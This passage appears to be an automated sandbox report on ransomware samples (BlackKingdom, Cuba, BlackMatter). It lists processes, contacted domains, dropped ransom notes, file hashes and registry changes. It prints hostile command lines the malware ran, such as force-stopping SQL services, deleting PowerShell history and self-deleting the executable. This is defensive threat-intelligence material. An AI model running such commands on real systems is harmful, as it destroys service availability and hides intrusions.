PID 2148 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 1660 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 1660 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 1660 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 2268 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2268 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2268 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 1660 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 1660 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 1888 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1888 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1888 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Service *sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell rm (Get-PSReadlineOption).HistorySavePath

Network

Country Destination Domain Proto
US 8.8.8.8:53 mega.io udp
LU 89.44.169.132:80 mega.io tcp
LU 89.44.169.132:443 mega.io tcp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.16:443 g.api.mega.co.nz tcp
LU 66.203.125.16:443 g.api.mega.co.nz tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI21482\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-core-localization-l1-2-0.dll

MD5 54d2f426bc91ecf321908d133b069b20
SHA1 78892ea2873091f016daa87d2c0070b6c917131f
SHA256 646b28a20208be68439d73efa21be59e12ed0a5fe9e63e5d3057ca7b84bc6641
SHA512 6b1b095d5e3cc3d5909ebda4846568234b9bc43784919731dd906b6fa62aa1fdf723ac0d18bca75d74616e2c54c82d1402cc8529d75cb1d7744f91622ac4ec06

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-core-processthreads-l1-1-1.dll

MD5 d1b3cc23127884d9eff1940f5b98e7aa
SHA1 d1b108e9fce8fba1c648afaad458050165502878
SHA256 51a73fbfa2afe5e45962031618ec347aaa0857b11f3cf273f4c218354bfe70cb
SHA512 ee5e0d546190e8ba9884ab887d11bb18fc71d3878983b544cd9ab80b6dd18ad65e66fe49fe0f4b92cbc51992fb1c39de091cf789159625341a03f4911b968fa2

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-core-file-l1-2-0.dll

MD5 b5060343583e6be3b3de33ccd40398e0
SHA1 5b33b8db5d6cfb0e8a5bb7f209df2c6191b02edb
SHA256 27878021c6d48fb669f1822821b5934f5a2904740bebb340b6849e7635490cb7
SHA512 86610edc05aa1b756c87160f9eefe9365e3f712c5bed18c8feca3cae12aef07ccc44c45c4be19dc8f9d337a6f6709b260c89019a5efcfe9fa0847d85ab64d282

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-core-timezone-l1-1-0.dll

MD5 36165a5050672b7b0e04cb1f3d7b1b8f
SHA1 ef17c4622f41ef217a16078e8135acd4e2cf9443
SHA256 d7ab47157bff1b2347e7ae945517b4fc256425939ba7b6288ff85a51931568a7
SHA512 da360ff716bb66dd1adb5d86866b4b81b08a6fe86362fded05430f833a96934ccdada1b3081b55766a4a30c16d0d62aa1715b8839ea5c405a40d9911715dae68

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-core-file-l2-1-0.dll

MD5 2e8995e2320e313545c3ddb5c71dc232
SHA1 45d079a704bec060a15f8eba3eab22ac5cf756c6
SHA256 c55eb043454ac2d460f86ea26f934ecb16bdb1d05294c168193a05090bf1c56c
SHA512 19adcc5dd98f30b4eebefe344e1939c93c284c802043ea3ac22654cf2e23692f868a00a482c9be1b1e88089a5031fa81a3f1165175224309828bd28ee12f2d49

C:\Users\Admin\AppData\Local\Temp\_MEI21482\python37.dll

MD5 c4709f84e6cf6e082b80c80b87abe551
SHA1 c0c55b229722f7f2010d34e26857df640182f796
SHA256 ca8e39f2b1d277b0a24a43b5b8eada5baf2de97488f7ef2484014df6e270b3f3
SHA512 e04a5832b9f2e1e53ba096e011367d46e6710389967fa7014a0e2d4a6ce6fc8d09d0ce20cee7e7d67d5057d37854eddab48bef7df1767f2ec3a4ab91475b7ce4

C:\Users\Admin\AppData\Local\Temp\_MEI21482\VCRUNTIME140.dll

MD5 89a24c66e7a522f1e0016b1d0b4316dc
SHA1 5340dd64cfe26e3d5f68f7ed344c4fd96fbd0d42
SHA256 3096cafb6a21b6d28cf4fe2dd85814f599412c0fe1ef090dd08d1c03affe9ab6
SHA512 e88e0459744a950829cd508a93e2ef0061293ab32facd9d8951686cbe271b34460efd159fd8ec4aa96ff8a629741006458b166e5cff21f35d049ad059bc56a1a

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-runtime-l1-1-0.dll

MD5 dbd23405e7baa8e1ac763fa506021122
SHA1 c50ae9cc82c842d50c4317034792d034ac7eb5be
SHA256 57fe2bab2acb1184a468e45cebe7609a2986d5220bb2d82592b9ca6e22384f89
SHA512 dafea32e44224b40dcc9ca96fd977a7c14128ca1dd0a6144844537d52ba25bcec83c2fa94a665a7497be9e079e7fc71298b950e3a8a0c03c4a5c8172f11063b9

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-string-l1-1-0.dll

MD5 aacade02d7aaf6b5eff26a0e3a11c42d
SHA1 93b8077b535b38fdb0b7c020d24ba280adbe80c3
SHA256 e71d517e6b7039437e3fc449d8ad12eeeca0d5c8ed1c500555344fd90ddc3207
SHA512 e02fcbcb70100f67e65903d8b1a7e6314cabfb0b14797bd6e1c92b7bcb3994a54133e35d16da0a29576145b2783221330591526f856b79a25c0575fc923985a6

\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-stdio-l1-1-0.dll

MD5 5df2410c0afd30c9a11de50de4798089
SHA1 4112c5493009a1d01090ccae810500c765dc6d54
SHA256 e6a1ef1f7c1957c50a3d9c1d70c0f7b0d8badc7f279cd056eb179dc256bfefda
SHA512 8ecb79078d05d5b2a432f511953985b3253d5d43d87709a5795709ee8dbca63c5f1166ed94d8984c13f2ea06adfa7d6b82c6735c23c6e64f2f37a257066864e6

\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-heap-l1-1-0.dll

MD5 a22f9a4cbd701209842b204895fedf37
SHA1 72fa50160baf1f2ea2adcff58f3f90a77a59d949
SHA256 2ee3d52640d84ac4f7f7ddfe748f51baa6fd0d492286c781251222420e85ca97
SHA512 903755d4fa6651669295a10e66be8ea223cd8d5ad60ebe06188d8b779fef7e964d0aa26dc5479f14aab655562d3c1ef76b86790fb97f991eaf52da0f70e40529

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-convert-l1-1-0.dll

MD5 0485c463cd8d2ae1cbd42df6f0591246
SHA1 ea634140905078e8f687a031ae919cff23c27e6f
SHA256 983f4d4c7b7330e7f5f091080c1e81905575ebccd97e11dff8a064979ec8d9b8
SHA512 ddf947a1b86c3826859570a3e1d59e4ec4564cfcf25c84841383a4b5f5ad6c2fe618078416aed201fb744d5fbd6c39dab7c1e964dd5e148da018a825fcc0044a

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-math-l1-1-0.dll

MD5 c4cac2d609bb5e0da9017ebb535634ce
SHA1 51a264ce4545a2f0d9f2908771e01e001b4e763e
SHA256 7c3336c3a50bf3b4c5492c0d085519c040878243e9f7d3ea9f6a2e35c8f1f374
SHA512 3b55bdbc5132d05ab53852605afe6ed49f4b3decdde8b11f19a621a78a37d98c7aeaaa8c10bf4565b9b50162816305fa5192ee31950a96dc08ae46bfc6af4ffe

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-locale-l1-1-0.dll

MD5 ba17b278fff2c18e34e47562ddde8166
SHA1 bed762d11b98737fcf1d1713d77345ec4780a8c2
SHA256 c36f5c0ac5d91a8417866dd4d8c670c2192ba83364693e7438282fb8678c3d1e
SHA512 72516b81606ccf836549c053325368e93264fdebc7092e42e3df849a16ccefa81b7156ae5609e227faa7c9c1bf9d68b2ac349791a839f4575728f350dd048f27

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-environment-l1-1-0.dll

MD5 e48a1860000fd2bd61566e76093984f5
SHA1 aa3f233fb19c9e7c88d4307bade2a6eef6518a8a
SHA256 67bbb287b2e9057bf8b412ad2faa266321ac28c6e6ba5f22169e2517a3ead248
SHA512 46b384c45d2fe2b70a5ac8ee087ba55828a62ccab876a21a3abd531d4de5ec7be21ff34b2284e0231b6cf0869eba09599c3b403db84448f20bd0fff88c1956d5

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-process-l1-1-0.dll

MD5 d8a5c1960281ec59fd4164c983516d7c
SHA1 29e6feff9fb16b9d8271b7da6925baf3c6339d06
SHA256 12bb3f480ec115d5f9447414525c5dcd236ed48356d5a70650541c9499bc4d19
SHA512 c97aa4029bcd8ffc490547dd78582ac81049dded2288102b800287a7fb623d9fde327702f8a24dfe2d2d67b2c9aaf97050756474faa4914ca4cb6038449c64bf

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-conio-l1-1-0.dll

MD5 75e626c3ebf160ebe75c59d3d6ac3739
SHA1 02a99199f160020b1086cec6c6a2983908641b65
SHA256 762ca8dd14f8ff603d06811ba904c973a684022202476bca45e9dc1345151ac4
SHA512 5ad205b90ac1658c5b07f6f212a82be8792999b68f9c9617a1298b04d83e7fcb9887ed307a9d31517bcba703b3ee6699ea93f67b06629355ea6519fed0a6d29a

\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-time-l1-1-0.dll

MD5 0d9afb006f46478008c180b9da5465ac
SHA1 3be2f543bbc8d9f1639d0ed798c5856359a9f29b
SHA256 c3a70153e1d0ecd1cbf95de033bfef5cfecabe7a8274cafe272cc2c14865cd8c
SHA512 4bd76efcb2432994d10884c302aee6cadbc2d594bbbd4e654c1e8547a1efd76fd92e4879b8120dfacb5e8a77826009f72faa5727b1aa559ed3fc86d0ce3ed029

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 1193f810519fbc07beb3ffbad3247fc4
SHA1 db099628a19b2d34e89028c2e16bc89df28ed78f
SHA256 ab2158fe6b354fb429f57f374ca25105b44e97edcbdc1b752650d895dadd6fd1
SHA512 3222a10c3be5098aca0211015efe75cfbcd408fd28315acedd016d8f77513f81e207536b072001525965635da39c4aae8ef9f6ad367f5d695de67b1614179353

C:\Users\Admin\AppData\Local\Temp\_MEI21482\base_library.zip

MD5 a70f10b994f5b2e03777b4d355eef788
SHA1 141be3cef837cf6120f71c714259d9799586b483
SHA256 766089d80d0136ce9a4f24f1dd717a8575b0075c5d9c3c72b84807e0647ffa2c
SHA512 5651e26f0a3de35e455977d3cfc06e2b38defe5e52656e3213177a0a621eca3b3391bf414371cecf88d9ff903747231092b8d1d2206d5f020e1c438c70d8eb38

C:\Users\Admin\AppData\Local\Temp\_MEI21482\_ctypes.pyd

MD5 5e869eebb6169ce66225eb6725d5be4a
SHA1 747887da0d7ab152e1d54608c430e78192d5a788
SHA256 430f1886caf059f05cde6eb2e8d96feb25982749a151231e471e4b8d7f54f173
SHA512 feb6888bb61e271b1670317435ee8653dedd559263788fbf9a7766bc952defd7a43e7c3d9f539673c262abedd97b0c4dd707f0f5339b1c1570db4e25da804a16

C:\Users\Admin\AppData\Local\Temp\_MEI21482\_socket.pyd

MD5 8ea18d0eeae9044c278d2ea7a1dbae36
SHA1 de210842da8cb1cb14318789575d65117d14e728
SHA256 9822c258a9d25062e51eafc45d62ed19722e0450a212668f6737eb3bfe3a41c2
SHA512 d275ce71d422cfaacef1220dc1f35afba14b38a205623e3652766db11621b2a1d80c5d0fb0a7df19402ebe48603e76b8f8852f6cbff95a181d33e797476029f0

C:\Users\Admin\AppData\Local\Temp\_MEI21482\select.pyd

MD5 fb4a0d7abaeaa76676846ad0f08fefa5
SHA1 755fd998215511506edd2c5c52807b46ca9393b2
SHA256 65a3c8806d456e9df2211051ed808a087a96c94d38e23d43121ac120b4d36429
SHA512 f5b3557f823ee4c662f2c9b7ecc5497934712e046aa8ae8e625f41756beb5e524227355316f9145bfabb89b0f6f93a1f37fa94751a66c344c38ce449e879d35f

C:\Users\Admin\AppData\Local\Temp\_MEI21482\pywintypes37.dll

MD5 77b6875977e77c4619bbb471d5eaf790
SHA1 f08c3bc5e918c0a197fbfd1b15e7c0491bd5fade
SHA256 780a72ba3215ff413d5a9e98861d8bb87c15c43a75bb81dc985034ae7dcf5ef6
SHA512 783939fc97b2445dfe7e21eb6b71711aba6d85e275e489eddcc4f20c2ed018678d8d14c9e1856f66e3876f318312d69c22cee77f9105a72e56a1be4f3e8a7c2e

C:\Users\Admin\AppData\Local\Temp\_MEI21482\_ssl.pyd

MD5 5a393bb4f3ae499541356e57a766eb6a
SHA1 908f68f4ea1a754fd31edb662332cf0df238cf9a
SHA256 b6593b3af0e993fd5043a7eab327409f4bf8cdcd8336aca97dbe6325aefdb047
SHA512 958584fd4efaa5dd301cbcecbfc8927f9d2caec9e2826b2af9257c5eefb4b0b81dbbadbd3c1d867f56705c854284666f98d428dc2377ccc49f8e1f9bbbed158f

C:\Users\Admin\AppData\Local\Temp\_MEI21482\libcrypto-1_1.dll

MD5 cc4cbf715966cdcad95a1e6c95592b3d
SHA1 d5873fea9c084bcc753d1c93b2d0716257bea7c3
SHA256 594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1
SHA512 3b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477

C:\Users\Admin\AppData\Local\Temp\_MEI21482\api-ms-win-crt-utility-l1-1-0.dll

MD5 9b622ca5388b6400705c8f21550bae8e
SHA1 eb599555448bf98cdeabc2f8b10cfe9bd2181d9f
SHA256 af1e1b84f066ba05da20847bffd874d80a810b5407f8c6647b3ff9e8f7d37863
SHA512 9872f54ac744cf537826277f1c0a3fd00c5aa51f353692c1929be7bc2e3836e1a52cab2c467ba675d4052ac3116f5622755c3db8be389c179f7d460391105545

C:\Users\Admin\AppData\Local\Temp\_MEI21482\libssl-1_1.dll

MD5 bc778f33480148efa5d62b2ec85aaa7d
SHA1 b1ec87cbd8bc4398c6ebb26549961c8aab53d855
SHA256 9d4cf1c03629f92662fc8d7e3f1094a7fc93cb41634994464b853df8036af843
SHA512 80c1dd9d0179e6cc5f33eb62d05576a350af78b5170bfdf2ecda16f1d8c3c2d0e991a5534a113361ae62079fb165fff2344efd1b43031f1a7bfda696552ee173

C:\Users\Admin\AppData\Local\Temp\_MEI21482\_hashlib.pyd

MD5 b32cb9615a9bada55e8f20dcea2fbf48
SHA1 a9c6e2d44b07b31c898a6d83b7093bf90915062d
SHA256 ca4f433a68c3921526f31f46d8a45709b946bbd40f04a4cfc6c245cb9ee0eab5
SHA512 5c583292de2ba33a3fc1129dfb4e2429ff2a30eeaf9c0bcff6cca487921f0ca02c3002b24353832504c3eec96a7b2c507f455b18717bcd11b239bbbbd79fadbe

C:\Users\Admin\AppData\Local\Temp\_MEI21482\tcl86t.dll

MD5 c0b23815701dbae2a359cb8adb9ae730
SHA1 5be6736b645ed12e97b9462b77e5a43482673d90
SHA256 f650d6bc321bcda3fc3ac3dec3ac4e473fb0b7b68b6c948581bcfc54653e6768
SHA512 ed60384e95be8ea5930994db8527168f78573f8a277f8d21c089f0018cd3b9906da764ed6fcc1bd4efad009557645e206fbb4e5baef9ab4b2e3c8bb5c3b5d725

\Users\Admin\AppData\Local\Temp\_MEI21482\_tkinter.pyd

MD5 09f66528018ffef916899845d6632307
SHA1 cf9ddad46180ef05a306dcb05fdb6f24912a69ce
SHA256 34d89fe378fc10351d127fb85427449f31595eccf9f5d17760b36709dd1449b9
SHA512 ed406792d8a533db71bd71859edbb2c69a828937757afec1a83fd1eacb1e5e6ec9afe3aa5e796fa1f518578f6d64ff19d64f64c9601760b7600a383efe82b3de

C:\Users\Admin\AppData\Local\Temp\_MEI21482\tk86t.dll

MD5 fdc8a5d96f9576bd70aa1cadc2f21748
SHA1 bae145525a18ce7e5bc69c5f43c6044de7b6e004
SHA256 1a6d0871be2fa7153de22be008a20a5257b721657e6d4b24da8b1f940345d0d5
SHA512 816ada61c1fd941d10e6bb4350baa77f520e2476058249b269802be826bab294a9c18edc5d590f5ed6f8dafed502ab7ffb29db2f44292cb5bedf2f5fa609f49c

memory/1380-1099-0x0000000002D70000-0x0000000002DF0000-memory.dmp

memory/1380-1100-0x000000001B560000-0x000000001B842000-memory.dmp

memory/1380-1101-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

C:\MSOCache\All Users\decrypt_file.TxT

MD5 a36d9aeb2b6bc7da5a8b336bbc4f542e
SHA1 f5caf80eccd8a2ee2095cfe4a3f2d796c6b47bc0
SHA256 3144df848208a9edef3e03d32a5ba4bf105186f48f7ed9e267876e4064681f9f
SHA512 a2aef5507e493340c95250f43227d8a6835c832d6a852e1b850e67ecccfa3934061220aa8bd94fa38721687681e9363f75ad364bb47c81c126c6f51fac682fa5

Analysis: behavioral15

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240705-en

Max time kernel

1560s

Max time network

1566s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

C:\Windows\SysWOW64\cmd.exe

/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL

Network

N/A

Files

memory/2108-0-0x0000000000520000-0x0000000000580000-memory.dmp

memory/2108-1-0x0000000000400000-0x000000000046C000-memory.dmp

C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\!!FAQ for Decryption!!.txt

MD5 69acb73a5829bdddc9a7cf322178c70f
SHA1 3cd71f6cc40c90322e027712403899db2976218b
SHA256 9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5
SHA512 380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e

memory/2108-1800-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2108-3317-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2108-4023-0x0000000000400000-0x000000000046C000-memory.dmp

memory/2108-5030-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2108-6488-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2108-8218-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2108-8549-0x0000000000400000-0x000000000046C000-memory.dmp

memory/2108-8548-0x0000000000400000-0x000000000051D000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240508-en

Max time kernel

1560s

Max time network

1562s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

Signatures

BlackMatter Ransomware

ransomware blackmatter

Renames multiple (180) files with added filename extension

ransomware

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\XS6hn5xhL.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\XS6hn5xhL.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\International C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 paymenthacks.com udp
US 8.8.8.8:53 paymenthacks.com udp
US 8.8.8.8:53 mojobiden.com udp
US 8.8.8.8:53 mojobiden.com udp
US 8.8.8.8:53 paymenthacks.com udp
US 8.8.8.8:53 paymenthacks.com udp
US 8.8.8.8:53 mojobiden.com udp
US 8.8.8.8:53 mojobiden.com udp

Files

memory/2576-0-0x0000000000200000-0x0000000000240000-memory.dmp

C:\XS6hn5xhL.README.txt

MD5 f66968c47a64569e2281f65a95991be0
SHA1 ef9e3e80bfbea4c3021b226cb8cd00687013b8a8
SHA256 4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf
SHA512 cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24

Analysis: behavioral16

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1559s

Max time network

1541s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

C:\Windows\SysWOW64\cmd.exe

/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 213.80.50.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/2112-0-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2112-1-0x00000000022D0000-0x0000000002330000-memory.dmp

memory/2112-2-0x0000000000400000-0x000000000046C000-memory.dmp

C:\Program Files\Common Files\microsoft shared\ink\ar-SA\!!FAQ for Decryption!!.txt

MD5 69acb73a5829bdddc9a7cf322178c70f
SHA1 3cd71f6cc40c90322e027712403899db2976218b
SHA256 9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5
SHA512 380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e

memory/2112-1339-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2112-1994-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2112-3958-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2112-4850-0x0000000000400000-0x000000000046C000-memory.dmp

memory/2112-6830-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2112-9596-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2112-12480-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2112-12482-0x0000000000400000-0x000000000046C000-memory.dmp

memory/2112-12481-0x0000000000400000-0x000000000051D000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-07-07 14:07

Reported

